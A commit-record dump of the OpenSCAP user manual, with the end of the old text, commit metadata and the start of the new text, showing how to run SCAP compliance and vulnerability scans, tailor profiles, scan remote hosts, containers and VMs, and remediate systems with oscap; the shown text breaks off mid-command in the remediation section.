The files we used above cover multiple Red Hat products. If you only want to
scan one product - for example a specific version of Red Hat Enterprise Linux -
we advise downloading a smaller specialized file covering just this one version.
Using a smaller file will use less bandwidth and make the evaluation
quicker.

For example, for Red Hat Enterprise Linux 7 the plain OVAL file is located at:

----
$ wget https://www.redhat.com/security/data/oval/Red_Hat_Enterprise_Linux_7.xml
----

You can get a list of all the plain OVAL files by visiting
https://www.redhat.com/security/data/oval/

The list of available datastream files is available at
https://www.redhat.com/security/data/metrics/ds/


==== Disclaimer
NOTE: Note that these OVAL definitions are designed to only cover software and
updates released by Red Hat.
You need to provide additional definitions in order
to detect the patch status of third-party software.

To find out more information about this project, see
https://www.redhat.com/security/data/metrics/.


=== How to Evaluate PCI-DSS on RHEL7
This section describes how to evaluate the Payment Card Industry Data Security
Standard (PCI-DSS) on Red Hat Enterprise Linux 7.

1) Install SSG which provides the PCI-DSS SCAP content

----
$ sudo yum install -y scap-security-guide
----

2) Verify that the PCI-DSS profile is present

----
$ oscap info /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

3) Evaluate the PCI-DSS content

----
$ oscap xccdf eval \
--results results.xml \
--profile xccdf_org.ssgproject.content_profile_pci-dss \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

4) Generate a report readable in a web browser.

----
$ oscap xccdf generate report --output report.html results.xml
----

=== How to Evaluate DISA STIG
This section describes how to evaluate the Defense Information Systems Agency
(DISA) Security Technical Implementation Guide (STIG) on Red Hat Enterprise
Linux 6.

1) Download the DISA STIG content.
----
$ wget http://iasecontent.disa.mil/stigs/zip/July2015/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip
----

2) Unpack the content.
---------------------------------------------------
$ unzip U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip
---------------------------------------------------

3) Fix the content using a sed substitution.
---------------------------------------------------------------------------------------------------
$ sed -i 's/<Group\ \(.*\)/<Group\ selected="false"\ \1/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
---------------------------------------------------------------------------------------------------

NOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF
specification 1.2] the `selected` attribute for *Rule* or *Group* is *true* by default.
It means that if you create a new profile even with only one rule selected, all
rules within the benchmark will be evaluated because they are set to true by default.
The
substitution will set all Groups as unselected by default, which means all
descendants will also be unselected by default.

4) Display a list of available profiles.
----
$ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

5) Evaluate your favorite profile, for example *MAC-1_Public*, and write
XCCDF results into the results.xml file.
----
$ oscap xccdf eval \
--profile MAC-1_Public \
--results results.xml \
--cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \
U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

6) Generate a scan report that is readable in a web browser.
-----
$ oscap xccdf generate report --output report.html results.xml
-----

If you are interested in DISA STIG content for RHEL5 or RHEL7 please visit
the {nvd}[National Vulnerability Database] and look for *Red Hat Enterprise
Linux 5* or *Red Hat Enterprise Linux 7* as a target product.

=== How to Evaluate United States Government Configuration Baseline (USGCB)
NOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can
acquire the content from the {ssg_git}[SSG] project.

The USGCB content represents the Tier IV Checklist for Red Hat
Enterprise Linux 5 (as defined by NIST Special Publication 800-70).

WARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1
or later.

After ensuring that the version of OpenSCAP on your system is
sufficient, perform the following tasks:

1) Download the USGCB content.
------------------------------------------------------------------------------
$ wget http://usgcb.nist.gov/usgcb/content/scap/USGCB-rhel5desktop-1.2.5.0.zip
------------------------------------------------------------------------------

2) Unpack the USGCB content.
--------------------------------------
$ unzip USGCB-rhel5desktop-1.2.5.0.zip
--------------------------------------

3) Run evaluation of the USGCB content.
----
$ oscap xccdf eval \
--profile united_states_government_configuration_baseline \
--cpe usgcb-rhel5desktop-cpe-dictionary.xml \
--oval-results \
--fetch-remote-resources \
--results results.xml \
usgcb-rhel5desktop-xccdf.xml
----

4) Generate a scan report that is readable in a web browser.
-----
$ oscap xccdf generate report --output report.html results.xml
-----

Additional reports can be generated from the detailed OVAL result files.
The scanner outputs OVAL results files in the current directory; for each
OVAL file on input there is one output file. In the case of USGCB, there is
one OVAL file distributed along with the XCCDF, and another one which is
downloaded from the Red Hat repository. The latter contains CVE information
for each evaluated definition.

----
$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml
$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml
----

If you're interested in running evaluation of the USGCB on a remote machine using
a GUI please see the
https://open-scap.org/resources/documentation/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench/[Evaluate
Remote Machine for USGCB Compliance with SCAP Workbench] tutorial.


=== How to Evaluate Third-Party Guidances
The SCAP content repository hosted at the {nvd}[National Vulnerability Database]
(NVD) can be searched for publicly available guidance for a given
product.
For example, as of 2013/05/11 there are
http://web.nvd.nist.gov/view/ncp/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]
Tier III checklists for Red Hat Enterprise Linux 5. Analogously, the
MITRE Corp. hosts a http://oval.mitre.org/rep-data/[repository] of OVAL
content for various platforms, sorted by versions and classes.

Like the USGCB, any downloaded guidance can be evaluated by
OpenSCAP.

* Example evaluation of the DoD Consensus Security Configuration Checklist
for Red Hat Enterprise Linux 5 (2.0)
----
$ wget http://nvd.nist.gov/ncp/DoD-RHEL5-desktop.zip
$ unzip DoD-RHEL5-desktop.zip
$ oscap xccdf eval \
--profile DOD_baseline_1.0.0.1 \
--cpe dcb-rhel5_cpe-dictionary.xml \
--results result.xml \
--oval-results \
dcb-rhel5_xccdf.xml
----

* Example evaluation of the Red Hat 5 STIG Benchmark (Version 1, Release 12)
----
$ wget http://iasecontent.disa.mil/stigs/zip/July2015/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip
$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip
$ oscap xccdf eval \
--profile MAC-2_Public \
--cpe U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \
--results result.xml \
--oval-results \
U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

Furthermore, any individual file from the archive can be inspected using
the `oscap info` command line option. The oscap program does not have
the concept of importing SCAP files, therefore it can process any SCAP
files available on the filesystem. That is possible because the SCAP
standard files are native file formats of OpenSCAP.



=== How to evaluate guidances for Red Hat Enterprise Linux 6 or 7
Guidances for Red Hat Enterprise Linux 6 and 7 can be acquired from the
{ssg_git}[SCAP Security Guide
project] (SSG). SSG currently holds the most evolved and elaborate SCAP
policy for Linux systems. The project provides practical security
hardening advice for Red Hat products and also links it to compliance
requirements in order to ease deployment activities, such as
certification and accreditation.

The project started in 2011 as an open collaboration of U.S. Government
bodies to develop the next generation of the United States Government
Configuration Baseline (USGCB) available for Red Hat Enterprise Linux 6.
Multiple parties from the public and private sectors contribute to the
project.

The SSG project contains baselines for both desktops and servers. See
https://github.com/OpenSCAP/scap-security-guide



=== How to check that patches are up-to-date on Red Hat Enterprise Linux 6 or 7
This section describes how to check that software patches are up-to-date using
external OVAL content.

1) Install the SSG

----
$ sudo yum install -y scap-security-guide
----

2a) Evaluate the common profile for RHEL 6

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources \
--results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

2b) Evaluate the common profile for RHEL 7

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources \
--results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

This command evaluates the common profile for Red Hat Enterprise Linux 6 or 7.
Part of the profile is a rule to check that patches are up-to-date. To evaluate
the rule correctly, the oscap tool needs to download an up-to-date OVAL file
from Red Hat servers. This can be allowed using the *--fetch-remote-resources*
option. The result of this scan will be saved in **results.xml** using the ARF
format.
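The ARF file can then be turned into a human-readable report (a usage sketch;
`oscap xccdf generate report` accepts ARF result files in recent OpenSCAP
versions):

----
$ oscap xccdf generate report --output report.html results.xml
----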
=== How to tailor Source data stream
This section describes tailoring of content using a tailoring file, which
allows you to change the behavior of the content without modifying it directly.

1) Obtain a tailoring file

A tailoring file can be easily generated using {workbench_url}[SCAP Workbench].

2) List the profiles of the tailoring file

----
$ oscap info ssg-rhel6-ds-tailoring.xml
Document type: XCCDF Tailoring
Imported: 2016-08-31T11:08:16
Benchmark Hint: /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
Profiles:
	xccdf_org.ssgproject.content_profile_C2S_customized
----

3) Evaluate

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_C2S_customized \
--tailoring-file ssg-rhel6-ds-tailoring.xml \
--results results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The command above evaluates the data stream tailored by the
**ssg-rhel6-ds-tailoring.xml** tailoring file.
XCCDF results can be found in the **results.xml** file.

Instead of an external tailoring file, you can also use a tailoring component
integrated into the data stream.

----
$ oscap info simple-ds.xml

Document type: Source Data Stream
Imported: 2016-02-02T14:06:14

Stream: scap_org.open-scap_datastream_from_xccdf_simple-xccdf.xml
Generated: (null)
Version: 1.2
Checklists:
	Ref-Id: scap_org.open-scap_cref_simple-xccdf.xml
		Status: incomplete
		Resolved: false
		Profiles:
			xccdf_org.open-scap_profile_override
		Referenced check files:
			simple-oval.xml
				system: http://oval.mitre.org/XMLSchema/oval-definitions-5
	Ref-Id: scap_org.open-scap_cref_simple-tailoring.xml
		Benchmark Hint: (null)
		Profiles:
			xccdf_org.open-scap_profile_default
			xccdf_org.open-scap_profile_unselecting
			xccdf_org.open-scap_profile_override
Checks:
	Ref-Id: scap_org.open-scap_cref_simple-oval.xml
No dictionaries.
----

To choose the tailoring component *scap_org.open-scap_cref_simple-tailoring.xml*,
the command below can be used.

----
$ oscap xccdf eval \
--tailoring-id scap_org.open-scap_cref_simple-tailoring.xml \
--profile xccdf_org.open-scap_profile_default \
--results results.xml simple-ds.xml
----

The command above evaluates content using the tailoring component
*scap_org.open-scap_cref_simple-tailoring.xml* from the source data stream.
Scan results are stored in the *results.xml* file.


=== Evaluation of content
The specified XCCDF or data stream content can contain zero or more profiles.

A scan can be run without selecting a specific profile; otherwise, a profile
can be selected using the *--profile* option.

----
$ oscap xccdf eval --results results.xml /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The command above evaluates the rules without a specific profile. XCCDF results
are stored in the *results.xml* file.
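For example, to evaluate the PCI-DSS profile from the same data stream (an
illustrative profile choice):

----
$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_pci-dss --results results.xml /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----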
== Other utilities

Apart from the `oscap` command, OpenSCAP also provides other utilities for
special purposes. Those utilities use `oscap` under the hood, but they
enable users to perform advanced tasks in a single command.
This manual gives a quick overview and shows the basic usage of these tools.
Each of the tools has its own manual page that gives more detailed information.

=== Scanning remote machines using oscap-ssh

`oscap-ssh` is a simple tool for scanning remote machines with OpenSCAP
over the network and collecting the results.

The tool uses an SSH connection to copy the SCAP content to a remote machine, then
it runs an evaluation of the target system and downloads the results back.
The remote machine needs to have OpenSCAP installed.

The tool can evaluate source DataStreams and OVAL files.
Usage of the tool mimics the usage and options of the `oscap` tool.

In the following example, we will scan a remote Fedora server located on IP address
*192.168.1.13* that listens for SSH connections on port *22*.
The server will be scanned for compliance with the *Common Profile for General-Purpose
Fedora Systems* provided by SCAP Security Guide.
An HTML report is written out as *report.html* on the local machine.

----
$ oscap-ssh root@192.168.1.13 22 xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--report report.html \
/usr/share/xml/scap/ssg/content/ssg-fedora-ds.xml
----

=== Scanning of Docker containers and images using oscap-docker

`oscap-docker` is used to scan Docker containers and images. It can
assess vulnerabilities in the container or image and check their compliance
with security policies. Usage of the tool mimics the usage and options
of the `oscap` tool.

The `oscap-docker` tool uses a technique called offline scanning.
That means that the filesystem of the container is mounted to a directory
on the host. The mounted filesystem is read-only. OpenSCAP then assesses
the container from the host. Therefore no agent is installed
in the container and the container is not touched or changed in any way.

However, `oscap-docker` requires http://www.projectatomic.io/[Atomic]
installed on the host. Atomic is an advanced container management solution and
it enables `oscap-docker` to access the containers.

In the first example, we will perform a vulnerability assessment
of a Docker image of Red Hat Enterprise Linux 7 (named *rhel7*). The command
will attach the docker image, determine the OS variant/version, download the
CVE stream applicable to the given image, and finally evaluate the image
for vulnerabilities.
The CVE stream is a list of vulnerabilities in SCAP format\nand is downloaded directly from Red Hat.\nThe HTML report is written out as *report.html* on the local machine.\n\n----\n$ oscap-docker image-cve rhel7 --report report.html\n----\n\nIn the second example, we will check the same *rhel7* image for\ncompliance with a security policy specified in an XCCDF checklist.\n\n----\n$ oscap-docker image rhel7 xccdf eval --report report.html xccdf.xml\n----\n\nTo scan running containers, the commands are very similar; just replace\n\"image-cve\" with \"container-cve\" and \"image\" with \"container\".\n\n=== Scanning of virtual machines using oscap-vm\n\nOpenSCAP provides a simple tool to evaluate virtual machines called `oscap-vm`.\n\nThe tool can scan a given virtual machine directly from the virtualisation host.\nUsage of the tool mimics the usage and options of the `oscap` tool.\n\nSimilarly to `oscap-docker`, this utility also uses offline scanning,\nso it doesn't install anything in the guest, doesn't require OpenSCAP\ninstalled in the guest and doesn't create or change anything in the\nguest's filesystem.\n\n=== Scanning arbitrary filesystems using oscap-chroot\n\nA very simple script `oscap-chroot` can be used to perform\nan offline scan of a filesystem that is mounted at an arbitrary path.\nIt can be used for scanning custom objects that are not supported\nby `oscap-docker` or `oscap-vm`, like containers in formats\nother than Docker.\nAgain, usage of the tool mimics the usage and options of the `oscap` tool.\n\n\n\n== Frequently Asked Questions (FAQs)\n*Why do I get \"notchecked\" results when I use e.g. the https:\/\/dl.dod.cyber.mil\/wp-content\/uploads\/stigs\/zip\/U_Red_Hat_Enterprise_Linux_7_V2R3_STIG.zip[STIG checklist]?*\n\nThe downloaded guidance contains rule descriptions, but it doesn't contain the OVAL checks that OpenSCAP needs for evaluation. You can find guidances with implemented OVAL checks, and also with remediations, at the https:\/\/github.com\/ComplianceAsCode\/content[ComplianceAsCode] project, which contains a wide range of profiles.\n\n*I try to apply a tailoring file, but OpenSCAP still evaluates rules that I have unselected. How can I enforce my changes of the profile?*\n\nMake sure that you provide the ID of the customized profile in the `--profile` option instead of the ID of the original profile.\nIf you created the tailoring file using SCAP Workbench, you were prompted to choose the ID of the customized profile. You can display the ID of the customized profile by running `oscap info <your_tailoring_file>`. 
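For example, for the tailoring file from the tailoring how-to above, the output would look similar to this (abridged):\n\n----\n$ oscap info ssg-rhel6-ds-tailoring.xml\nDocument type: XCCDF Tailoring\nProfiles:\n\txccdf_org.ssgproject.content_profile_C2S_customized\n----\n\n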
By default, the ID of the customized profile ends with the `_customized` suffix.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"7b4f58a379fe30f0d0af6154ad8a1c544f750c25","subject":"update repository name","message":"update repository name\n","repos":"Hexadorsimal\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,ybznek\/openscap,mpreisler\/openscap,ybznek\/openscap,redhatrises\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,ybznek\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,ybznek\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"= OpenSCAP User Manual\nMichal \u0160ruba\u0159 <msrubar@redhat.com>\nv1.0, 2015-08-31\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about the command-line tool\n ```oscap``` and its most common operations. With ```oscap``` you can check the\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n ```oscap``` tool uses {scap}[SCAP], a line of specifications maintained by\n{nist}[NIST] that was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The ```oscap``` tool mainly processes\n{xccdf}[XCCDF], a standard way of expressing checklist content that\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. 
For more information about\nSCAP, please refer to the http:\/\/open-scap.org\/features\/standards\/[SCAP Standards] page.\n\nThe ```oscap``` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool, please visit the\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the _scap-security-guide_ {ssg}[SSG] project to provide the SCAP\ncontent. It provides security policies written in the form of SCAP documents\ncovering many areas of computer security, and it implements security guidances\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool for doing the customization.\n\nThe Basic oscap Usage section of the manual presents how to install the tool\nand SCAP content, and how to use them to examine SCAP content, perform a\nconfiguration scan, or automatically remediate your machines.\n\nThe third section covers advanced topics like validation, signing and\ntransformation of SCAP content, generating reports and guides, and also some\ninformation about CPE applicability.\n\nThe last section contains information about debugging and compiling oscap on Linux\nand Windows, which can be useful for developers.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (```oscap``` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the ```oscap``` tool from\n{oscap_git}[source] (for details please refer to the <<devs-compiling,compiling>> section),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----\n# yum install openscap-scanner\n----\n\nNOTE: If ```openscap-scanner``` is not available, install\n ```openscap-utils``` instead.\n\nBefore you can start using the ```oscap``` tool you must have some SCAP content\non your system. You can download it from the respective web site, but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----\n# yum install scap-security-guide\n----\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, ```oscap``` can\nprocess the content by specifying the file path to the content. The ```oscap``` tool\nsupports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----\n$ oscap -V\n----\n\n
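On a typical build, the output begins similarly to the following (an abridged, version-dependent sketch rather than exact output):\n\n----\nOpenSCAP command line tool (oscap) 1.2.9\nCopyright 2009--2016 Red Hat Inc., Durham, North Carolina.\n\n==== Supported specifications ====\nXCCDF Version: 1.2\nOVAL Version: 5.11.1\n...\n----\n\n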
=== Displaying Information about SCAP Content\nOne of the capabilities of ```oscap``` is to display information about the SCAP\ncontents within a file. Running the ```oscap info``` command allows\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (Generated) and the date the document was copied to\nthe file system (Imported). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams. The following example demonstrates usage of the command:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nThe following is a sample output of the command above:\n\n----\nDocument type: Source Data Stream\nImported: 2015-07-13T10:23:11\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n\t\tProfiles:\n\t\t\txccdf_org.ssgproject.content_profile_standard\n\t\t\txccdf_org.ssgproject.content_profile_pci-dss\n\t\t\txccdf_org.ssgproject.content_profile_rht-ccp\n\t\t\txccdf_org.ssgproject.content_profile_common\n\t\t\txccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n\t\tReferenced check files:\n\t\t\tssg-rhel7-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\n=== Scanning with oscap\nThe main goal of the ```oscap``` tool is to perform configuration and\nvulnerability scans of a local system. It is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or a SCAP data stream), or as multiple\nseparate XML files. The following examples distinguish between these two\napproaches.\n\n==== OVAL\nThe SCAP document can have the form of a single OVAL file (an OVAL\nDefinition file). The ```oscap``` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to the standard output\nstream.
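 The printed lines have roughly the following shape (the definition ID is illustrative and the exact wording may differ between OpenSCAP versions):\n\n----\nDefinition oval:com.example.www:def:1: true\nEvaluation done.\n----\n\n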
The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----\nWhere the OVAL definition being evaluated is identified by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream collection, run the\nfollowing command:\n----\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n----\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables have to be exported to a special file that is used during the\nevaluation of the OVAL definitions. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the OVAL Result file.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, ```oscap``` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs a system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to the standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. 
The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated as\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n\n* To evaluate a specific XCCDF benchmark that is part of a data stream\nwithin a SCAP data stream collection run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit ```--datastream-id``` on the command line, the first data\nstream from the collection will be used. If you omit ```--xccdf-id```, the\nfirst component from the checklists element will be used. If you omit\nboth, the first data stream that has a component in the checklists\nelement will be used, together with the first component in its checklists\nelement.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a data stream within a SCAP data stream collection run\nthe following command:\n\n----\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nthe xccdf:Benchmark contained in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n=== Remediate System\nOpenSCAP allows you to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package contains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . ```oscap``` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . ```oscap``` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by ```oscap``` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . 
Whenever ```oscap``` executes a fix script, it immediately evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of ```oscap``` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the ```--remediate``` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml 